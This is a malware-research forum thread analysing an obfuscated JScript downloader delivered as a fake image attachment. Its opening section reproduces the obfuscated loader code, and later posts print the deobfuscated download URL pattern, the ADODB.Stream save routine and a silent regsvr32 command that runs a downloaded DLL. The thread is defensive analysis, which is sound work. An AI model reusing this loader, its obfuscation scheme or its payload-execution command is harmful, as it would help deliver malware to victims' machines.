CgxqojrkdjgdteQxbedyq = 2+4+6+3+7+3;
KkxqojrkwerwweDpqgkqufr = 3-2;
Eqknugpd7d7Cgxqojr = 0;


Faqhlwugtkjst4jayMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("UFXFCGCFKFQ");
kjIsqxeihyatOafwhmtd = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDUENEUENELFD");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("XFXFTFIFNGAFKGEFLFTFNFXGEGAFLFNGAGEFT");


var ppjjhMaqkwugrjjhGwlnigi ;
var dfDpqgkqufrregqqKkxqojr ;
var ajgMaqkwugrshdkNameGwlnigi;
var ashtFaqhlwugtewaaGwlnigi;
var Eqknugpgja1111jhauNaflwigt;

Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq");
ppjjhMaqkwugrjjhGwlnigi = WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);


dfDpqgkqufrregqqKkxqojr = ppjjhMaqkwugrjjhGwlnigi.UserName;
ajgMaqkwugrshdkNameGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB") + ppjjhMaqkwugrjjhGwlnigi.UserName;
//C:\\ProgramData\\UseName

ghetstHafleihtytqerGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEGEWFMFDFKFO");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("LFBFGEYCRDQFBFEEWEE");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("AFGFAFBELETDOEIEQELEJFB");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YFMFLFNFJFNFKGFGAGFFKFXGAGFFKFXGF");
sDpqgkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
//Scripting.FileSystemObject

edNaflwigtjy3gaFaqhlwugt = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
Cgxqojrjhhq23Eqknugp = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("HERETEUEVEREUERETEWFDFNFDEWFNFDFNFDCTCSCUCVCSCUCV");
aKkxqojrvitiLpdkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
aFaqhlwugthst33faLpdkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);


CgxqojrkjdfhsyeDpqgkqufr = 1000+KkxqojrkwerwweDpqgkqufr+32;

//"C:\ProgramData\UserName\auidxx60.log"
if (edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("HEJEJEOFJEW") + NaflwigtGwlnigiLpdkqufrRgxqojrn("FEPFKFK") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("HCNFAFDEU"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHCPEPEQFDEQFDENEQENFDCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("VEXEXFVGCFVFWFHFPDCGAFVFI"))){
KkxqojrkkkBxmohen("MaqkwugrDpqgkqufr");
}
}
//"C:\ProgramData\UserName\auidxx60.log"
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("JELELEQFLEY") + NaflwigtGwlnigiLpdkqufrRgxqojrn("LEVFQFQ") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("OCUFHFKFC"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHFCEOFHFCEPFDENEQFHCPCOFEEQCOCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("BEDEDFBFHFBFCEMEUCHFFFBEN"))){
KkxqojrkkkBxmohen("CgxqojrEqknugp");
}
}
//"C:\ProgramData\UserName\auidxx60.log"
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("CEEEEEJFEEREMFHFH") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("CCIEUEXEP"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFOFUDCDEFRDEDCDDFRDEFUFCFEDDDCFPFDFP") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFAFAFXGEFXFYFJFRDEGCFXFK"))){
KkxqojrkkkBxmohen("CgxqojrGwlnigi");
}
}


if(! (sDpqgkqufr.FolderExists(ajgMaqkwugrshdkNameGwlnigi))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFPFDFFFSDDDFDEFSDFFSFSFSFVFQFP");
sDpqgkqufr.CreateFolder(ajgMaqkwugrshdkNameGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("VFTFHGAFUFWDHDIFWDJDJDIDJFT");
}

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("LESEXFOFJCWCXCXFRCWCXFRFMCWCXCYFMCYFMFPCXCWFKEXFK") ;
piIsqxeihynqwKkxqojr = NaflwigtGwlnigiLpdkqufrRgxqojrn("GCMCODABXDYDRDIDICP") + ")";
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFUDFDGDHFUDGFUDFDHFUFUFHFFFUFXDGDFFSFGFS") ;
AswjleihyutywreNaflwigt = Dpqgkqufrjhs11ksMaqkwugr;
Cgxqojrggrres1Lpdkqufr = 24-20;
Aswjleihyy356haeKkxqojr = 10-4 ;
CgxqojrolkijueBxmohen = Aswjleihyy356haeKkxqojr+Aswjleihyy356haeKkxqojr;
akDpqgkqufrjsdiGwlnigi = 816;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+816;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+400;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+800;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+32;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+400;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("CEJEOFFFAFBENEPFDCNCPFDCPFGCOCNFBEOFB") ;
aEqknugpoeywMaqkwugr = 65;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+35;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+24;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+50;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+25;

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("AEHEMFDEXFECLCMCNFBCLFBCNCMCMCLCMCLEYEMEY") ;


MaqkwugrxxhgsreIsqxeihy = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEHFAFFDR");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("KFLFLFHCQEHFA");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFDFBFEFQFBFEFQFDFBFOFUDDDCFPFDFP") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RFMDYFS");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("QFRFNEI");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOEXFKEUEXEWFKEUEXEUEWEXFKEUEWEXCWCVFJEWFJ") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFGFK");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("GERFGFH");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEUFAFQFLFRDAFNEXFBEXFBFNEXFAFBCYFMFAFM") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("LCRCY");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RCXDB");
Aswjleihyuhg3atCgxqojr = " (";
Gwlnigikjdyhe5gahsCgxqojr = 34871;
IsqxeihykjshsMaqkwugr = 32876;

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("SFAFFFVFSFDFFFGFWFWFRFQFWFEFRFQFWDFDEFRFFFR");
fdKkxqojrjkuuqFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("BDBDEDPDEDCCHDTFCFAEMEIEU");

KkxqojrfhttwshPlmeheiq = 2000+96+1500+500;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFRFSFRFXFSFRFSFXDGDFFSFGFS");
skdhKkxqojrgfiqwreiPlmeheiq = KkxqojrfhttwshPlmeheiq+KkxqojrfhttwshPlmeheiq;
ajskCgxqojrgfiuyriw4355Oafwhmtd = 1;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("OEVFBFRFMFSDBDAFNFCFDFFFDFBFFFBFN");
aKkxqojrsdhgfqiutrHafleiht = 2;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("WFEFJGAFUGBDJDIFVFNFLFJFNFLFJFNFLFKFJFV");


function GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
try
{
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFFFQDCDDDEFQFVFDFSFVFRFVDEDDFSFVDFDD");
cxjfkgriqdafGwlnigi.Write(DpqgkqufrkjsadhieGwlnigi);
cxjfkgriqdafGwlnigi.SaveToFile(NaflwigtkjsdsfgerieKkxqojr, aKkxqojrsdhgfqiutrHafleiht);
}
catch (Kkxqojr)
{

}
}


function Gwlnigishfiw11kjshasEqknugp(DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
var cxjfkgriqdafGwlnigi;

try
{
cxjfkgriqdafGwlnigi = WScript.CreateObject(fdKkxqojrjkuuqFaqhlwugt);
cxjfkgriqdafGwlnigi.Type = ajskCgxqojrgfiuyriw4355Oafwhmtd;
cxjfkgriqdafGwlnigi.Open();
GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr);
}
catch (Kkxqojr)
{

}
}

EqknugpkjdshuMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("TEGFPGBFJFMFMFBDBDGDADC") + Aswjleihyuhg3atCgxqojr;
EqknugpjsdhrFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("GEPFCFA") + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFUFFFYFNFGFQFJDRCPEKEQEGECCPDNDEDGDRCPEUFNFSFIFTGCFXCPELERCPDM");
DpqgkqufrjsdhuiCgxqojr = EqknugpkjdshuMaqkwugr + EqknugpjsdhrFaqhlwugt + piIsqxeihynqwKkxqojr;


function MaqkwugrllaakkssdKkxqojr(sAswjleihy, sdGwlnigiawIsqxeihy){
var CgxqojrdjfgaaKkxqojr;
var sxJsqgxeohytrAHafleiht;
var stDpqgkqufrrBIsqxeihy;
var stNaflwigtreetrKkxqojr;
var stBxmohenrttrDLpdkqufr;
var cxjfkgriqdafGwlnigi;

try
{
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOFOEVFJEXFOFJEXFOEXCWCVFJEWFJ") ;
sxJsqgxeohytrAHafleiht = NaflwigtGwlnigiLpdkqufrRgxqojrn("XEEECER");
stDpqgkqufrrBIsqxeihy = "";
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("WFEFJGAFUGBDJDIFOFMFPFSFYFMFSFSFTFYFMFTFVFJFV") ;
stNaflwigtreetrKkxqojr = DpqgkqufrjsdhuiCgxqojr;
stBxmohenrttrDLpdkqufr = akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("UFCFHFXFRFWFKFQFWFRFKFQFWFSFYDHDGFTFHFT") ;
CgxqojrdjfgaaKkxqojr = WScript.CreateObject(MaqkwugrxxhgsreIsqxeihy);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("XFKFJFTFUGAFNFUFNFTGAFUDIFVFWFK");
CgxqojrdjfgaaKkxqojr.settimeouts(Gwlnigikjdyhe5gahsCgxqojr, 34566, Gwlnigikjdyhe5gahsCgxqojr, IsqxeihykjshsMaqkwugr);
CgxqojrdjfgaaKkxqojr.Option(AswjleihyutywreNaflwigt) = stNaflwigtreetrKkxqojr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKFDENENEPERENEPEREQEQCNCPCQ");
CgxqojrdjfgaaKkxqojr.Option(Cgxqojrggrres1Lpdkqufr) = stBxmohenrttrDLpdkqufr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKENEPEQERENEPERENEQEREPEQCNCQFE");
CgxqojrdjfgaaKkxqojr.Option(Aswjleihyy356haeKkxqojr) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Option(CgxqojrolkijueBxmohen) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Open(sxJsqgxeohytrAHafleiht, sAswjleihy, CgxqojrertydfgDpqgkqufr);
CgxqojrdjfgaaKkxqojr.Send(stDpqgkqufrrBIsqxeihy);
if((CgxqojrdjfgaaKkxqojr.Status == aEqknugpoeywMaqkwugr+KkxqojrkwerwweDpqgkqufr)){
MaqkwugrllaakkssdKkxqojr = CgxqojrdjfgaaKkxqojr.ResponseBody;
try
{
Gwlnigishfiw11kjshasEqknugp(CgxqojrdjfgaaKkxqojr.ResponseBody,sdGwlnigiawIsqxeihy);
}
catch (Kkxqojr)
{

}

}
}
catch (Kkxqojr)
{

}
CgxqojrdjfgaaKkxqojr = null;
cxjfkgriqdafGwlnigi = null;
}

(1) ADODB.Stream is only use to save files in "c:\ProgramData\UserName" (hidden Folder)
=> if the complete path doesn't exist, it is created.

"C:\ProgramData\UserName\UserNamexmda.jpg"
"C:\ProgramData\UserName\UserNamexmdb.jpg"
"C:\ProgramData\UserName\UserNamexmdc.jpg"
"C:\ProgramData\UserName\guildwg.gif"
"C:\ProgramData\UserName\UserNamewg.gif"


(2) The Regsvr32 Tool (regsvr32.exe) is used to register UserNamewg.gif in silent mode

Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);


The other files downloaded are not ran by the downloader.

(3) .log files are used

if WScript.ScriptFullName != "C:\ProgramData\UserName\system.wsf"

"C:\ProgramData\UserName\r2.log"
"C:\ProgramData\UserName\auid.log"
"C:\ProgramData\UserName\auidxx60.log"


The WScript.ScriptFullName value is wrote to the end of the file (option 8 : Open a file and write to the end)
Thank you for clarification and explanation :)
 

jamescv7

Level 85
Verified
Honorary Member
Mar 15, 2011
13,070
A very smart obfuscation implementation provided there, the main target to analyze well despite of random strings are the dropper of files; creation of scripts and especially the payloads to be retrieved from possible C&C server.
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
A very smart obfuscation implementation provided there, the main target to analyze well despite of random strings are the dropper of files; creation of scripts and especially the payloads to be retrieved from possible C&C server.
All what the js downloader (Anexo_Email_Visualizar.JPG.js) does has been describe above (post 1 & post 9).

I have tried to put obfuscated part description with clear part corresponding,
not only with random string, also with important parts.
I used a lot the spoiler option.

See part (5) for urls used, files dropped : 3 spoilers (one spoiler is inside a spoiler) :

"https://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/?v=60&x1x2c=[fileID]";
=> I know the [fileID] for each file downloaded. I didn't write them for security purpose.
Each correspond to one of below files:

"C:\ProgramData\UserName\UserNamexmda.jpg"
"C:\ProgramData\UserName\UserNamexmdb.jpg"
"C:\ProgramData\UserName\UserNamexmdc.jpg"
"C:\ProgramData\UserName\guildwg.gif"
"C:\ProgramData\UserName\UserNamewg.gif"


Objet_ADODB_Stream = WScript.CreateObject( "ADODB.Stream");
Objet_ADODB_Stream.Type = 1;
Objet_ADODB_Stream.Open();
Objet_ADODB_Stream.Write(object_http.ResponseBody);
Objet_ADODB_Stream.SaveToFile(file_path, 2)

(option 2: Overwrites the file with the data from the currently open Stream object, if the file already exists)

The log files are not created, but if found, the current scrip full name is appended.

One exception :
if (Objet_Scripting_FileSystemObject.FileExists("C:\ProgramData\UserName\auidxx60.log")){
if((WScript.ScriptFullName != "C:\ProgramData\UserName\system.wsf")){
WScript_Quit(0);
}
}


Now I will certainly try to get all files and analyse their content, and UserNamewg.gif behaviour, because of :

Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);


UserNamewg.gif seems to be a PE32 executable (DLL) , UPX compressed
/s => registered in silent mode (display no message boxes)

The way the obfuscation is done makes very easy to replace with a tool data that should be modified when needed : domains, parameters, file ids, file names, for example from a config file.
=> only encrypted data contains these information.
=> just vars linked have to be replace with new encrypted string (often several vars for one whole data).
The main structure of code doesn't need to be changed.

N.B.: I've cleaned the js downloader version, will see if I can join it here in a zip file with original and clean version, with password.
Or a pdf :p
JUST FOR INFORMATION PURPOSE
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Here are two pdf files : one with the original obfuscated code, and the other after I dis-obfuscated / cleaned / cleared the content. We can see in clear part that several functions are doing the same job => it could have been more optimizade.

A problem I've seen : this file / obfuscated method isn't currently detected by several AVs
If you receive such a file, it will be now easy for you to detect it as malware, just by opening it with notepad.

ONLY FOR INFORMATION PURPOSE
 

Attachments

  • Clear-clean.pdf
    231.5 KB · Views: 455
  • obfuscated.pdf
    261 KB · Views: 267
Last edited:
  • Like
Reactions: LabZero and frogboy

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top